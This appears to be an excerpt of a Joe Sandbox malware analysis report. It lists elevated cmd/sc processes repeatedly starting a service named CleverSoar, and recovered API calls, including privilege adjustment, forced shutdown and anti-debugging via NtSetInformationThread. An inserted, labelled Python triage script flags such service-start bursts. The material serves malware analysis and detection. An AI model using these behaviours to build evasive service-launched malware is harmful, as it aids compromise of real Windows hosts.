                        Target ID:76
                        Start time:03:45:21
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:77
                        Start time:03:45:21
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:78
                        Start time:03:45:21
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:79
                        Start time:03:45:21
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:80
                        Start time:03:45:21
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:81
                        Start time:03:45:21
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:82
                        Start time:03:45:21
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:83
                        Start time:03:45:21
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:84
                        Start time:03:45:21
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:85
                        Start time:03:45:21
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:86
                        Start time:03:45:21
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:87
                        Start time:03:45:22
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:88
                        Start time:03:45:22
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:89
                        Start time:03:45:22
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:90
                        Start time:03:45:22
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:91
                        Start time:03:45:22
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:92
                        Start time:03:45:22
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:93
                        Start time:03:45:23
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:94
                        Start time:03:45:23
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:95
                        Start time:03:45:23
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:96
                        Start time:03:45:23
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:97
                        Start time:03:45:23
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:98
                        Start time:03:45:23
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:99
                        Start time:03:45:23
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:100
                        Start time:03:45:23
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:101
                        Start time:03:45:23
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:102
                        Start time:03:45:23
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:103
                        Start time:03:45:23
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:104
                        Start time:03:45:23
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:105
                        Start time:03:45:23
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:106
                        Start time:03:45:23
                        Start date:22/12/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start CleverSoar
                        Imagebase:0x7ff6f6870000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:107
                        Start time:03:45:23
                        Start date:22/12/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:108
                        Start time:03:45:23
                        Start date:22/12/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c start sc start CleverSoar
                        Imagebase:0x7ff716990000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true
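
The repeated cmd.exe / sc.exe pairs above all run `sc start CleverSoar` with elevated privileges inside the same second (03:45:23), each with its own conhost.exe sibling. As an added example, not part of the Joe Sandbox report or of the analysed sample, the following Python parses process-detail blocks in exactly the `Key:Value` layout shown above, reports every sc.exe service-control invocation together with the shell wrapper that spawned it, and flags same-second bursts of the same command. The records it runs on are constructed for the example (shaped on the entries above); the service name CleverSoar is taken from this page, while the verb list, the wrapper set and the burst threshold are assumptions of the example.

```python
"""Service-control triage over Joe Sandbox-style process records.

Added example for this report page, not part of Joe Sandbox or of the sample:
parses the 'Key:Value' process blocks shown in the report, reports sc.exe
start/create/config/... invocations (and the cmd/powershell wrappers that
launch them) by service, privilege level and start time, then flags bursts.
"""
import re
from collections import Counter, defaultdict

# Matches 'sc start CleverSoar', 'sc.exe create "My Svc" binPath= ...', etc.
# The verb list is an assumption of this example, not a Joe Sandbox signature.
SC_VERB_RE = re.compile(
    r'\bsc(?:\.exe)?\s+(start|create|config|stop|delete|failure)\s+'
    r'(?:"([^"]+)"|(\S+))',
    re.IGNORECASE,
)
WRAPPERS = {'cmd.exe', 'powershell.exe', 'pwsh.exe'}   # assumed wrapper images


def _rec(tid, path, cmdline, elevated='true', when='03:45:23'):
    """Build one block in the report's own 'Key:Value' layout (constructed data)."""
    return (f"Target ID:{tid}\nStart time:{when}\nStart date:22/12/2024\n"
            f"Path:{path}\nCommandline:{cmdline}\n"
            f"Has elevated privileges:{elevated}\nHas exited:true\n")


# Constructed sample: three cmd->sc pairs in one second (as on this page), one
# conhost sibling, a non-elevated 'sc query' and one unrelated process.
SAMPLE_TEXT = "\n".join([
    _rec(93, r"C:\Windows\System32\cmd.exe", "cmd /c start sc start CleverSoar"),
    _rec(94, r"C:\Windows\System32\sc.exe", "sc start CleverSoar"),
    _rec(95, r"C:\Windows\System32\conhost.exe",
         r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    _rec(96, r"C:\Windows\System32\cmd.exe", "cmd /c start sc start CleverSoar"),
    _rec(97, r"C:\Windows\System32\sc.exe", "sc start CleverSoar"),
    _rec(99, r"C:\Windows\System32\cmd.exe", "cmd /c start sc start CleverSoar"),
    _rec(100, r"C:\Windows\System32\sc.exe", "sc start CleverSoar"),
    _rec(200, r"C:\Windows\System32\sc.exe", "sc query wuauserv",
         elevated='false', when='03:50:01'),
    _rec(201, r"C:\Windows\System32\notepad.exe", "notepad.exe",
         elevated='false', when='03:50:02'),
])


def parse_records(text):
    """One dict per 'Target ID' block. Only the first ':' separates key from
    value, so times ('03:45:23') and drive letters ('C:\\...') survive intact."""
    records = []
    for block in re.split(r'\n\s*\n', text.strip()):
        rec = {}
        for line in block.splitlines():
            if ':' in line:
                key, value = line.strip().split(':', 1)
                rec[key.strip()] = value.strip()
        if 'Target ID' in rec:
            records.append(rec)
    return records


def find_service_control(records):
    """Service-control commands, tagged as direct sc.exe runs or shell wrappers."""
    findings = []
    for rec in records:
        image = rec.get('Path', '').rsplit('\\', 1)[-1].lower()
        m = SC_VERB_RE.search(rec.get('Commandline', ''))
        if not m:
            continue
        if image == 'sc.exe':
            kind = 'sc'
        elif image in WRAPPERS:
            kind = 'wrapper'
        else:
            continue   # e.g. an editor whose argument merely contains 'sc start'
        findings.append({
            'target_id': int(rec['Target ID']),
            'kind': kind,
            'verb': m.group(1).lower(),
            'service': m.group(2) or m.group(3),   # quoted or bare service name
            'elevated': rec.get('Has elevated privileges', '').lower() == 'true',
            'when': f"{rec.get('Start date', '?')} {rec.get('Start time', '?')}",
        })
    return findings


def service_summary(findings):
    """service -> {verb: count}, over direct sc.exe runs only (wrappers would double count)."""
    out = defaultdict(Counter)
    for f in findings:
        if f['kind'] == 'sc':
            out[f['service']][f['verb']] += 1
    return {svc: dict(c) for svc, c in out.items()}


def retry_bursts(findings, threshold=3):
    """(service, verb, when) groups with >= threshold direct sc.exe runs in one second.
    Such a burst is what a start-until-it-works loop looks like in a process list;
    it is a prompt to check whether the service ever came up, not proof by itself."""
    groups = Counter((f['service'], f['verb'], f['when'])
                     for f in findings if f['kind'] == 'sc')
    return {k: n for k, n in groups.items() if n >= threshold}


if __name__ == '__main__':
    found = find_service_control(parse_records(SAMPLE_TEXT))
    for f in found:
        print(f"{f['target_id']:>4} {f['kind']:<8} {f['verb']:<7} "
              f"{f['service']:<12} elevated={f['elevated']} at {f['when']}")
    print('summary:', service_summary(found))
    print('bursts :', retry_bursts(found))
```

Run it as a script to see the three `CleverSoar` start bursts, or feed `parse_records` a saved copy of the report's process list. On a live host the same fields come from Sysmon Event ID 1 (CommandLine, ParentCommandLine, IntegrityLevel) or from Security event 4688 with command-line auditing enabled; only the record shape in `parse_records` changes. Whether the service actually started is not something the process list alone can tell you, so a flagged burst should be followed by checking the service's configured binary and the sc.exe exit codes before drawing a conclusion.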


                          Execution Graph

                          Execution Coverage:1.9%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:5.2%
                          Total number of Nodes:733
                          Total number of Limit Nodes:8
                          execution_graph: the rendered call graph (733 nodes, 8 limit nodes) does not survive as text and is omitted here. What is recoverable from its node labels is the set of Windows API calls reached on the covered code paths, all at addresses between 0x6c89xxxx and 0x6ca3xxxx, grouped by function:
                          Service control: OpenSCManagerA, OpenServiceA
                          Process enumeration and creation: CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, CreateProcessA, WaitForSingleObject
                          Privilege adjustment followed by a power-state change: GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, NtInitiatePowerAction (one node); a separate path calls ExitWindowsEx and then Sleep
                          Self-termination: GetCurrentProcess, TerminateProcess
                          File and console I/O: FindFirstFileA, FindClose, CreateFileA, CreateFileW, ReadFile, WriteFile, GetFileType, SetStdHandle, CloseHandle, GetConsoleMode, ReadConsoleW
                          Environment checks and timing: IsProcessorFeaturePresent, Sleep
                          CRT and runtime support: HeapAlloc, HeapFree, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, RaiseException, MultiByteToWideChar
                          The runtime symbol names attached to graph nodes (__wsopen_s, __dosmaperr, std::ios_base::_Ios_base_dtor, std::_Facet_Register, _Yarn, _strlen) are those of the MSVC C/C++ runtime, consistent with the "Programmed in: C, C++" classification above.
62465->62462 62465->62463 62465->62464 62466 6ca2a98c __wsopen_s 62 API calls 62465->62466 62466->62465 62467->62449 62468->62455 62469->62462 62471 6ca14e45 62470->62471 62472 6c8e2020 52 API calls 62471->62472 62473 6ca14ee6 62472->62473 62474 6ca15863 std::_Facet_Register 4 API calls 62473->62474 62475 6ca14f1e 62474->62475 62476 6ca16147 43 API calls 62475->62476 62477 6ca14f32 62476->62477 62478 6c8e1d90 89 API calls 62477->62478 62479 6ca14fdb 62478->62479 62480 6ca1500c 62479->62480 62524 6c8e2250 30 API calls 62479->62524 62480->61942 62482 6ca15046 62525 6c8e26e0 24 API calls 4 library calls 62482->62525 62484 6ca15058 62526 6ca18199 RaiseException 62484->62526 62486 6ca1506d 62527 6c8de010 67 API calls 62486->62527 62488 6ca1507f 62488->61942 62490 6ca151ad 62489->62490 62528 6ca153c0 62490->62528 62492 6ca1529c 62492->61947 62495 6ca151c5 62495->62492 62546 6c8e2250 30 API calls 62495->62546 62547 6c8e26e0 24 API calls 4 library calls 62495->62547 62548 6ca18199 RaiseException 62495->62548 62498 6c8f25cf 62497->62498 62501 6c8f25e3 62498->62501 62557 6c8e3560 32 API calls std::_Xinvalid_argument 62498->62557 62503 6c8f269e 62501->62503 62559 6c8e2250 30 API calls 62501->62559 62560 6c8e26e0 24 API calls 4 library calls 62501->62560 62561 6ca18199 RaiseException 62501->62561 62504 6c8f26b1 62503->62504 62558 6c8e37e0 32 API calls std::_Xinvalid_argument 62503->62558 62504->61947 62508 6ca149be 62507->62508 62512 6ca149f1 62507->62512 62509 6c8e01f0 64 API calls 62508->62509 62511 6ca149e4 62509->62511 62510 6ca14aa3 62510->61953 62513 6ca1f938 67 API calls 62511->62513 62512->62510 62562 6c8e2250 30 API calls 62512->62562 62513->62512 62515 6ca14ace 62563 6c8e2340 24 API calls 62515->62563 62517 6ca14ade 62564 6ca18199 RaiseException 62517->62564 62519 6ca14ae9 62565 6c8de010 67 API calls 62519->62565 62521 6ca14b42 std::ios_base::_Ios_base_dtor 62521->61953 62522->61945 62523->61952 62524->62482 62525->62484 62526->62486 62527->62488 62529 6ca15428 
62528->62529 62530 6ca153fc 62528->62530 62535 6ca15439 62529->62535 62549 6c8e3560 32 API calls std::_Xinvalid_argument 62529->62549 62545 6ca15421 62530->62545 62551 6c8e2250 30 API calls 62530->62551 62533 6ca15608 62552 6c8e2340 24 API calls 62533->62552 62535->62545 62550 6c8e2f60 42 API calls 4 library calls 62535->62550 62536 6ca15617 62553 6ca18199 RaiseException 62536->62553 62540 6ca15647 62555 6c8e2340 24 API calls 62540->62555 62541 6ca15473 62541->62545 62554 6c8e2250 30 API calls 62541->62554 62543 6ca1565d 62556 6ca18199 RaiseException 62543->62556 62545->62495 62546->62495 62547->62495 62548->62495 62549->62535 62550->62541 62551->62533 62552->62536 62553->62541 62554->62540 62555->62543 62556->62545 62557->62501 62558->62504 62559->62501 62560->62501 62561->62501 62562->62515 62563->62517 62564->62519 62565->62521 62566 6c8af150 62568 6c8aefbe 62566->62568 62567 6c8af243 CreateFileA 62570 6c8af2a7 62567->62570 62568->62567 62569 6c8b02ca 62570->62569 62571 6c8b02ac GetCurrentProcess TerminateProcess 62570->62571 62571->62569 62572 6c893d62 62575 6c893bc0 62572->62575 62573 6c893e8a GetCurrentThread NtSetInformationThread 62574 6c893eea 62573->62574 62575->62573 62576 6ca1dd5f 62577 6ca1dd6b __wsopen_s 62576->62577 62578 6ca1dd72 GetLastError ExitThread 62577->62578 62579 6ca1dd7f 62577->62579 62580 6ca237d2 __Getctype 37 API calls 62579->62580 62581 6ca1dd84 62580->62581 62588 6ca28b86 62581->62588 62584 6ca1dd9b 62594 6ca1dcca 16 API calls 2 library calls 62584->62594 62587 6ca1ddbd 62589 6ca1dd8f 62588->62589 62590 6ca28b98 GetPEB 62588->62590 62589->62584 62593 6ca25b8f 5 API calls std::_Lockit::_Lockit 62589->62593 62590->62589 62591 6ca28bab 62590->62591 62595 6ca25c38 5 API calls std::_Lockit::_Lockit 62591->62595 62593->62584 62594->62587 62595->62589
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: _strlen
                          • String ID: HR^
                          • API String ID: 4218353326-1341859651
                          • Opcode ID: d530b424e2f33bc0aafa98faea8bc41b466304c71ac8571f5e842c14982bb654
                          • Instruction ID: 7ed6296131bfecc6fd9e1521d3c00ff670feb08488c36ac9f307683e560de9bc
                          • Opcode Fuzzy Hash: d530b424e2f33bc0aafa98faea8bc41b466304c71ac8571f5e842c14982bb654
                          • Instruction Fuzzy Hash: 6274E471644B028FC738CF2CC9D0695B7E2FF95318B198E6DC0AA8BA55E774B54ACB40

                          Control-flow Graph
                          • Function at 6ca098b0 (basic blocks 6ca098b0 through 6ca0996c); the executed/not-executed edge list is omitted. The function calls FindFirstFileA and FindClose.
                          APIs
                          • FindFirstFileA.KERNEL32(?,?), ref: 6CA098CC
                          • FindClose.KERNEL32(000000FF), ref: 6CA09949
                          Strings
                          Memory Dump Source and Joe Sandbox IDA Plugin snapshot: identical to the first record above (process 6, module base 6C890000).
                          Similarity
                          • API ID: Find$CloseFileFirst
                          • String ID: gF:E$hF:E$hF:E
                          • API String ID: 2295610775-4234190611
                          • Opcode ID: 9b106b0b82de7340a89b557632fc41e246229da4c1fef69284b0b92242556492
                          • Instruction ID: ec018e1440dd9a9cc7e5f93cbb5d9f48399dce9a23077844032abdb9b5adc939
                          • Opcode Fuzzy Hash: 9b106b0b82de7340a89b557632fc41e246229da4c1fef69284b0b92242556492
                          • Instruction Fuzzy Hash: 4C116D746097419FC7148E78E544A4ABBF0BB86398F584E49F4A8C77A1E330CD88CB42

                          Control-flow Graph
                          • Function at 6ca14050 (basic blocks 6ca14050 through 6ca141d5); the executed/not-executed edge list is omitted. The function calls CreateToolhelp32Snapshot, Process32FirstW, Process32NextW and CloseHandle, plus the internal routines 6ca21a25 and 6ca1a740.
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6CA1405E
                          • CloseHandle.KERNEL32(?), ref: 6CA140EC
                          Memory Dump Source and Joe Sandbox IDA Plugin snapshot: identical to the first record above (process 6, module base 6C890000).
                          Similarity
                          • API ID: CloseCreateHandleSnapshotToolhelp32
                          • String ID:
                          • API String ID: 3280610774-0
                          • Opcode ID: a356fdd0be9b5ee6a5c4f94dfac2a41e264caf189603b6a0641014fec355aebe
                          • Instruction ID: 94beea4e967032327c78c94568df38aa21231246ac424cdbbb600d5d4e2404bd
                          • Opcode Fuzzy Hash: a356fdd0be9b5ee6a5c4f94dfac2a41e264caf189603b6a0641014fec355aebe
                          • Instruction Fuzzy Hash: 21315EB064C3009FD710DF69C88574ABBE4EB8A368F144A19F598C3BA0D339D884DB43

                          Control-flow Graph
                          • Function at 6c893886 (basic blocks 6c89383b through 6c89414b); the executed/not-executed edge list is omitted. The function calls the internal routines 6c9e18a0, 6c9e18b0 and 6c893750, and in the block 6c893e81-6c893ee0 calls GetCurrentThread followed by NtSetInformationThread.
                          Memory Dump Source and Joe Sandbox IDA Plugin snapshot: identical to the first record above (process 6, module base 6C890000).
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e0f50237311ab6e08ce9e8096c77f57436e2e95b829a8bc245d7c45df008c8d0
                          • Instruction ID: b97e9f9f9a79084127cc0db0cd03dac7e38648d72002c970f0ae93bcb037fb36
                          • Opcode Fuzzy Hash: e0f50237311ab6e08ce9e8096c77f57436e2e95b829a8bc245d7c45df008c8d0
                          • Instruction Fuzzy Hash: 8932C132245B018FC334CF2CC9D0695B7E3EFD53147698E6CC0AA5BA55D775B84A8B50
                          APIs
                          Memory Dump Source and Joe Sandbox IDA Plugin snapshot: identical to the first record above (process 6, module base 6C890000).
                          Similarity
                          • API ID: CurrentThread
                          • String ID:
                          • API String ID: 2882836952-0
                          • Opcode ID: e9e5d317233e69ea14b37a82395766f9227272527ec25739b5e2cd15dc0d2ff5
                          • Instruction ID: f4bf3b18db00deb2e5df67f04de761ffc0c4e9df4c7e54f16617b8301bbd4299
                          • Opcode Fuzzy Hash: e9e5d317233e69ea14b37a82395766f9227272527ec25739b5e2cd15dc0d2ff5
                          • Instruction Fuzzy Hash: 2D51CF31544B018FC3308F28C990785B7E3BFE6314F698E5DC0AA5BA95DB74B94A8B41
                          APIs
                          Memory Dump Source and Joe Sandbox IDA Plugin snapshot: identical to the first record above (process 6, module base 6C890000).
                          Similarity
                          • API ID: CurrentThread
                          • String ID:
                          • API String ID: 2882836952-0
                          • Opcode ID: ee163927ca17778f4c6db58f85af789f42985c59086641f9e05af506b5860873
